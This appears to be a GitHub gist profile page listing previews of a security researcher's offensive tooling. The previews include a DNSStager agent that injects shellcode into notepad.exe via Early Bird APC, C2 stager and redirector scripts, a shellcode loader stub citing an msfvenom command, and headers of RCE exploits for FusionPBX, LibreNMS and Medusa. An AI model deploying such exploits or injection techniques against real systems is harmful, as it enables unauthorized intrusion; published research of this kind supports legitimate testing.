Skip to content

Instantly share code, notes, and snippets.

View mhaskar's full-sized avatar
🎯
Focusing

Askar mhaskar

🎯
Focusing
View GitHub Profile
@mhaskar
mhaskar / client-ipv6-generic.c
Created January 24, 2022 00:09
DNSStager v1.0 beta agent to inject the retrived shellcode in notepad.exe and using Early Bird APC
#include <stdint.h>
#include <inttypes.h>
#include <winsock2.h>
#include <windns.h>
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
site_host(localip(), 80, "/ab2g", "TEXT", "text/html", "Stager Override", false);
site_host(localip(), 443, "/ab2g", "TEXT", "text/html", "Stager Override", true);
site_host(localip(), 80, "/ab2h", "TEXT", "text/html", "Stager Override", false);
site_host(localip(), 443, "/ab2h", "TEXT", "text/html", "Stager Override", true);
@mhaskar
mhaskar / Automated-Redirectors.py
Last active February 17, 2024 16:48
Python script to create HTTPS redirectors that pointing to your C2
#!/usr/bin/python
import requests
import json
import time
import paramiko
from Crypto.PublicKey import RSA
from os import chmod
public_key_name = "test1.key"
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
alias python3=python3.6
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'FusionPBX v4.4.8 authenticated Remote Code Execution',
'Privileged' => true,
#!/usr/bin/python
'''
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
# Date: 24/12/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-20434
# Vendor Homepage: https://www.librenms.org/
# Version: v1.46
# Tested on: Ubuntu 18.04 / PHP 7.2.10
#include <windows.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv){
//msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode
@mhaskar
mhaskar / find_address.py
Last active November 9, 2023 19:31
Find DLL function address using python
#!usr/bin/python
'''
Description : find any windows function address from any DLL
Author : Askar @mohammadaskar2
'''
from ctypes import windll
import sys
@mhaskar
mhaskar / Medusa-Exploit.py
Created August 20, 2018 15:56
Unauthenticated RCE - Medusa Crowd-Sensing Framework (CVE-2018-15577)
#!/usr/bin/python
'''
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE
# Date: 16/08/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-15577 - RESERVED
# Vendor Homepage: https://github.com/USC-NSL/Medusa/
# Version: V1.0
# Tested on: Ubuntu 16.04 / PHP 7.0.28
@mhaskar
mhaskar / Medusa-Exploit.py
Created August 20, 2018 15:55
Unauthenticated RCE - Medusa Crowd-Sensing Framework
#!/usr/bin/python
'''
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE
# Date: 16/08/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-15577 - RESERVED
# Vendor Homepage: https://github.com/USC-NSL/Medusa/
# Version: V1.0
# Tested on: Ubuntu 16.04 / PHP 7.0.28